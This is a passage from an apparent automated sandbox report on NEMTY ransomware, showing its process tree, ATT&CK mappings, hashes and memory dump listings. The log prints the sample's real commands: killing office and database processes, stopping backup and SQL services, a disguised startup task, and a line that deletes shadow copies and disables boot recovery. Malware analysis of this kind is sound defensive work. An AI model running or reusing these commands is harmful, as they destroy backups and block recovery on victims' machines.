2⤵
PID:2096

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im outlook.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4916

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im wordpad.*
2⤵
PID:2668

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im wordpad.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4792

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im oracle.*
2⤵
PID:1312

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im oracle.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.*
2⤵
PID:2596

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im excel.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im onenote.*
2⤵
PID:1524

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im onenote.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5092

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im node.*
2⤵
PID:3680

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im node.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4884

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im QBW32.*
2⤵
PID:2644

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im QBW32.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im virtualboxvm.*
2⤵
PID:3872

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im virtualboxvm.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4304

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im WBGX.*
2⤵
PID:1828

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im WBGX.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im Teams.*
2⤵
PID:1336

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Teams.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5072

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im Flow.*
2⤵
PID:1872

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Flow.*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop DbxSvc
2⤵
PID:4132

C:\Windows\SysWOW64\net.exe
net stop DbxSvc
3⤵
PID:5220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DbxSvc
4⤵
PID:5428

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop OracleXETNSListener
2⤵
PID:4168

C:\Windows\SysWOW64\net.exe
net stop OracleXETNSListener
3⤵
PID:5228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleXETNSListener
4⤵
PID:5372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop AcrSch2Svc
2⤵
PID:4276

C:\Windows\SysWOW64\net.exe
net stop AcrSch2Svc
3⤵
PID:5248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc
4⤵
PID:5480

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop OracleServiceXE
2⤵
PID:4236

C:\Windows\SysWOW64\net.exe
net stop OracleServiceXE
3⤵
PID:5184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleServiceXE
4⤵
PID:5444

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop AcronisAgent
2⤵
PID:4312

C:\Windows\SysWOW64\net.exe
net stop AcronisAgent
3⤵
PID:5160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent
4⤵
PID:5300

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop Apache2.4
2⤵
PID:4352

C:\Windows\SysWOW64\net.exe
net stop Apache2.4
3⤵
PID:5280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Apache2.4
4⤵
PID:5472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop SQLWriter
2⤵
PID:4388

C:\Windows\SysWOW64\net.exe
net stop SQLWriter
3⤵
PID:5392

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter
4⤵
PID:5536

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop MSSQL$SQLEXPRESS
2⤵
PID:4432

C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQLEXPRESS
3⤵
PID:5328

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
4⤵
PID:5592

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop MSSQLServerADHelper100
2⤵
PID:4476

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
3⤵
PID:5416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
4⤵
PID:5696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop MongoDB
2⤵
PID:4520

C:\Windows\SysWOW64\net.exe
net stop MongoDB
3⤵
PID:5500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MongoDB
4⤵
PID:5728

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop SQLAgent$SQLEXPRESS
2⤵
PID:4588

C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SQLEXPRESS
3⤵
PID:5528

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
4⤵
PID:5708

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop SQLBrowser
2⤵
PID:4632

C:\Windows\SysWOW64\net.exe
net stop SQLBrowser
3⤵
PID:5544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser
4⤵
PID:5768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop cbVSCService11
2⤵
PID:4728

C:\Windows\SysWOW64\net.exe
net stop cbVSCService11
3⤵
PID:5640

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop cbVSCService11
4⤵
PID:5756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop QBVSS
2⤵
PID:4840

C:\Windows\SysWOW64\net.exe
net stop QBVSS
3⤵
PID:5516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBVSS
4⤵
PID:5580

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop QBCFMontorService
2⤵
PID:4768

C:\Windows\SysWOW64\net.exe
net stop QBCFMontorService
3⤵
PID:5436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMontorService
4⤵
PID:5628

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop
2⤵
PID:4876

C:\Windows\SysWOW64\net.exe
net stop
3⤵
PID:5748

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop
4⤵
PID:5828

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop CobianBackup11
2⤵
PID:4684

C:\Windows\SysWOW64\net.exe
net stop CobianBackup11
3⤵
PID:5608

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CobianBackup11
4⤵
PID:5740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop
2⤵
PID:4948

C:\Windows\SysWOW64\net.exe
net stop
3⤵
PID:5792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop
4⤵
PID:5912

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop
2⤵
PID:3888

C:\Windows\SysWOW64\net.exe
net stop
3⤵
PID:5884

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop
4⤵
PID:5960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop
2⤵
PID:5064

C:\Windows\SysWOW64\net.exe
net stop
3⤵
PID:5848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop
4⤵
PID:5924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop
2⤵
PID:5200

C:\Windows\SysWOW64\net.exe
net stop
3⤵
PID:5972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop
4⤵
PID:6004

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop
2⤵
PID:5864

C:\Windows\SysWOW64\net.exe
net stop
3⤵
PID:6040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop
4⤵
PID:6084

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks.exe /create /sc onstart /tn "NEMTY_O85YRFZ" /tr "C:\Users\Admin\AdobeUpdate.exe"
2⤵
PID:6032

C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /sc onstart /tn "NEMTY_O85YRFZ" /tr "C:\Users\Admin\AdobeUpdate.exe"
3⤵
- Creates scheduled task(s)
PID:6116

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete
2⤵
PID:4924

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:5372

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5228

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\NEMTY_O85YRFZ-DECRYPT.txt"
2⤵
- Modifies registry class
PID:5612

C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\NEMTY_O85YRFZ-DECRYPT.txt
3⤵
PID:4212

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4016

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

File Deletion

2

T1107

Install Root Certificate

1

T1130

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\NEMTY_O85YRFZ-DECRYPT.txt
MD5
5a6559091bbc265f02a0a6a278097d6a

SHA1
ead7e4671ada9d7d72aeba9dfc5506f83a89d715

SHA256
4dbc1444d9bf7790afee764262d108077310233d44524f0c32f639dc44ed79f5

SHA512
e18681f20cb798ff19e847eb3d4d2ea0ba4e3896b009d0ceb3f682eae6401d9d5bf47919fedf3628f05a77810fc17f646886533ac3c049f9bc514cf59553ef9d

Download Submit
memory/1208-119-0x0000000000000000-mapping.dmp

Download
memory/1312-125-0x0000000000000000-mapping.dmp

Download
memory/1336-132-0x0000000000000000-mapping.dmp

Download
memory/1524-127-0x0000000000000000-mapping.dmp

Download
memory/1756-121-0x0000000000000000-mapping.dmp

Download
memory/1776-120-0x0000000000000000-mapping.dmp

Download
memory/1828-131-0x0000000000000000-mapping.dmp

Download
memory/1872-133-0x0000000000000000-mapping.dmp

Download
memory/2032-117-0x0000000000000000-mapping.dmp

Download
memory/2096-123-0x0000000000000000-mapping.dmp

Download
memory/2596-126-0x0000000000000000-mapping.dmp

Download
memory/2644-130-0x0000000000000000-mapping.dmp

Download
memory/2668-122-0x0000000000000000-mapping.dmp

Download
memory/2932-116-0x0000000000000000-mapping.dmp

Download
memory/3680-129-0x0000000000000000-mapping.dmp

Download
memory/3692-118-0x0000000000000000-mapping.dmp

Download
memory/3872-128-0x0000000000000000-mapping.dmp

Download
memory/3888-161-0x0000000000000000-mapping.dmp

Download
memory/4012-124-0x0000000000000000-mapping.dmp

Download
memory/4084-114-0x0000000000610000-0x0000000000628000-memory.dmp

Filesize
96KB

Download
memory/4084-115-0x0000000000400000-0x0000000000522000-memory.dmp

Filesize
1.1MB

Download
memory/4132-134-0x0000000000000000-mapping.dmp

Download
memory/4168-135-0x0000000000000000-mapping.dmp

Download
memory/4236-136-0x0000000000000000-mapping.dmp

Download
memory/4276-137-0x0000000000000000-mapping.dmp

Download
memory/4304-162-0x0000000000000000-mapping.dmp

Download
memory/4312-138-0x0000000000000000-mapping.dmp

Download
memory/4352-139-0x0000000000000000-mapping.dmp

Download
memory/4384-163-0x0000000000000000-mapping.dmp

Download
memory/4388-140-0x0000000000000000-mapping.dmp

Download
memory/4432-141-0x0000000000000000-mapping.dmp

Download
memory/4476-142-0x0000000000000000-mapping.dmp

Download
memory/4520-143-0x0000000000000000-mapping.dmp

Download
memory/4588-144-0x0000000000000000-mapping.dmp

Download
memory/4632-145-0x0000000000000000-mapping.dmp

Download
memory/4684-146-0x0000000000000000-mapping.dmp

Download
memory/4696-147-0x0000000000000000-mapping.dmp

Download
memory/4728-148-0x0000000000000000-mapping.dmp

Download
memory/4768-149-0x0000000000000000-mapping.dmp

Download
memory/4780-150-0x0000000000000000-mapping.dmp

Download
memory/4792-151-0x0000000000000000-mapping.dmp

Download
memory/4824-164-0x0000000000000000-mapping.dmp

Download
memory/4828-152-0x0000000000000000-mapping.dmp

Download
memory/4840-153-0x0000000000000000-mapping.dmp

Download
memory/4876-154-0x0000000000000000-mapping.dmp

Download
memory/4884-165-0x0000000000000000-mapping.dmp

Download
memory/4916-155-0x0000000000000000-mapping.dmp

Download
memory/4948-156-0x0000000000000000-mapping.dmp

Download
memory/4992-157-0x0000000000000000-mapping.dmp

Download
memory/5000-158-0x0000000000000000-mapping.dmp

Download
memory/5064-159-0x0000000000000000-mapping.dmp

Download
memory/5072-166-0x0000000000000000-mapping.dmp

Download
memory/5092-160-0x0000000000000000-mapping.dmp

Download
memory/5144-167-0x0000000000000000-mapping.dmp

Download
memory/5160-168-0x0000000000000000-mapping.dmp

Download
memory/5184-169-0x0000000000000000-mapping.dmp

Download
memory/5200-170-0x0000000000000000-mapping.dmp

Download
memory/5220-172-0x0000000000000000-mapping.dmp

Download
memory/5228-171-0x0000000000000000-mapping.dmp

Download
memory/5248-173-0x0000000000000000-mapping.dmp

Download
memory/5280-174-0x0000000000000000-mapping.dmp

Download
memory/5300-175-0x0000000000000000-mapping.dmp

Download
memory/5328-176-0x0000000000000000-mapping.dmp

Download
memory/5372-177-0x0000000000000000-mapping.dmp

Download
memory/5392-178-0x0000000000000000-mapping.dmp

Download
memory/5416-179-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads